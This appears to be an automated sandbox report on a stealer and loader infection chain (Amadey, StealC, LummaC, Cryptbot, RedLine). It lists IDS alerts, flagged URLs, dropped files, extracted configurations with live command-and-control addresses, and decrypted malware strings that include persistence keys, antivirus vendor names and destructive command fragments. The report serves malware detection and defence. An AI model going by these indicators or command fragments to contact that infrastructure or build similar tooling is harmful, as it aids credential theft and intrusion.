2025-02-01T21:36:20.935231+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49736	172.67.181.203	443	TCP
2025-02-01T21:37:28.256745+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49910	172.67.139.144	443	TCP
2025-02-01T21:37:36.737620+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49970	172.67.181.203	443	TCP
2025-02-01T21:38:19.912092+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50141	172.67.181.203	443	TCP
2025-02-01T21:38:55.628579+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50153	172.67.181.203	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:35.191908+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49746	185.215.113.115	80	TCP
2025-02-01T21:37:39.981802+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49995	185.215.113.115	80	TCP
2025-02-01T21:38:08.512166+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50104	185.215.113.115	80	TCP
2025-02-01T21:38:14.128663+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50135	185.215.113.115	80	TCP
2025-02-01T21:38:41.174087+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50152	185.215.113.115	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:05.649656+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49772	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:15.937332+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49774	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:08.776178+0100	2803305	3	Unknown Traffic	192.168.2.4	49776	185.215.113.97	80	TCP
2025-02-01T21:37:17.403454+0100	2803305	3	Unknown Traffic	192.168.2.4	49834	185.215.113.97	80	TCP
2025-02-01T21:37:23.029283+0100	2803305	3	Unknown Traffic	192.168.2.4	49871	185.215.113.97	80	TCP
2025-02-01T21:37:28.579630+0100	2803305	3	Unknown Traffic	192.168.2.4	49915	185.215.113.16	80	TCP
2025-02-01T21:37:34.009310+0100	2803305	3	Unknown Traffic	192.168.2.4	49954	185.215.113.16	80	TCP
2025-02-01T21:37:39.378922+0100	2803305	3	Unknown Traffic	192.168.2.4	49991	185.215.113.16	80	TCP
2025-02-01T21:37:44.277191+0100	2803305	3	Unknown Traffic	192.168.2.4	50028	185.215.113.16	80	TCP
2025-02-01T21:37:49.127965+0100	2803305	3	Unknown Traffic	192.168.2.4	50062	185.215.113.97	80	TCP
2025-02-01T21:37:55.310388+0100	2803305	3	Unknown Traffic	192.168.2.4	50088	185.215.113.97	80	TCP
2025-02-01T21:38:00.955575+0100	2803305	3	Unknown Traffic	192.168.2.4	50094	185.215.113.97	80	TCP
2025-02-01T21:38:07.771042+0100	2803305	3	Unknown Traffic	192.168.2.4	50108	185.215.113.97	80	TCP
2025-02-01T21:38:17.602860+0100	2803305	3	Unknown Traffic	192.168.2.4	50139	185.215.113.97	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:37.415572+0100	2803304	3	Unknown Traffic	192.168.2.4	49746	185.215.113.115	80	TCP
2025-02-01T21:36:50.595334+0100	2803304	3	Unknown Traffic	192.168.2.4	49769	185.215.113.115	80	TCP
2025-02-01T21:36:51.683710+0100	2803304	3	Unknown Traffic	192.168.2.4	49769	185.215.113.115	80	TCP
2025-02-01T21:36:52.316165+0100	2803304	3	Unknown Traffic	192.168.2.4	49769	185.215.113.115	80	TCP
2025-02-01T21:36:52.917494+0100	2803304	3	Unknown Traffic	192.168.2.4	49769	185.215.113.115	80	TCP
2025-02-01T21:36:54.628097+0100	2803304	3	Unknown Traffic	192.168.2.4	49769	185.215.113.115	80	TCP
2025-02-01T21:36:55.068525+0100	2803304	3	Unknown Traffic	192.168.2.4	49769	185.215.113.115	80	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:40.009405+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49998	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:49.133111+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49998	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:38:27.056926+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	50145	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:38:19.133082+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	50143	103.84.89.222	33791	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:38:17.199154+0100	2843864	1	A Network Trojan was detected	192.168.2.4	50138	172.67.181.203	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:38:02.767525+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.4	50095	116.202.5.153	443	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:40.009405+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.4	49998	103.84.89.222	33791	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: random.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://warlikedbeliev.org/ndows	Avira URL Cloud: Label: malware
Source: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA17382324894fd4	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/w%	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/nss3.dllp	Avira URL Cloud: Label: malware
Source: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCo	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click:443/api	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/api	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/mozglue.dll6	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/ws	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org:443/api8k	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/W	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php&	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/freebl3.dllc	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/freebl3.dll	Avira URL Cloud: Label: malware
Source: home.fivegg5th.top	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php3	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/9	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/A	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/1	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpjson	Avira URL Cloud: Label: malware
Source: gPhome.fivegg5th.top	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpPX	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/mozglue.dll	Avira URL Cloud: Label: malware
Source: https://getyour.cyou#;/Dd	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/apin	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/apiz	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/apix	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/Y	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpc	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org:443/api	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlls9	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpl	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlls8	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/apizdf_	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/i	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phps	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}
Source: 1cfdc82c16.exe.2316.13.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": "https://rampnatleadk.click/api", "Build Version": "fBkCmu--labinstall"}
Source: 5f198671b1.exe.7960.12.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["home.fivegg5th.top", ".fivgg5th.top", ".fivhttph.top", "gPhome.fivegg5th.top", "a.dnspod.comh.top"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1062359001\51c549c9c2.exe	ReversingLabs: Detection: 66%

Multi AV Scanner detection for submitted file

Source: random.exe

Virustotal: Detection: 52%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: random.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 185.215.113.43
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: S-%lu-
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abc3bc1985
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: skotes.exe
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Startup
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Programs
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: %USERPROFILE%
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: clip.dll
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: http://
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: https://
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /quiet
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Plugins/
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: &unit=
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shell32.dll
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: kernel32.dll
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProgramData\
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: AVAST Software
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Kaspersky Lab
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Panda Security
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Doctor Web
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 360TotalSecurity
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Bitdefender
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Norton
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Sophos
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Comodo
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: WinDefender
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 0123456789
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ------
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ?scr=1
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ComputerName
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -unicode-
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: VideoID
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProductName
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: CurrentBuild
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32.exe
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: "taskkill /f /im "
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && timeout 1 && del
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: && Exit"
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && ren
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Powershell.exe
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shutdown -s -t 0
Source: 00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	String decryptor: random

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4CA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6C4CA9A0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4C4440 PK11_PrivDecrypt,	2_2_6C4C4440
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C494420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	2_2_6C494420
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4C44C0 PK11_PubEncrypt,	2_2_6C4C44C0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C5125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	2_2_6C5125B0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4CA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	2_2_6C4CA650
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4A8670 PK11_ExportEncryptedPrivKeyInfo,	2_2_6C4A8670
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4AE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	2_2_6C4AE6E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4EA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	2_2_6C4EA730
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4F0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	2_2_6C4F0180
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4C43B0 PK11_PubEncryptPKCS1,PR_SetError,	2_2_6C4C43B0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4E7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	2_2_6C4E7C00
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4A7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	2_2_6C4A7D60
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4EBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	2_2_6C4EBD30
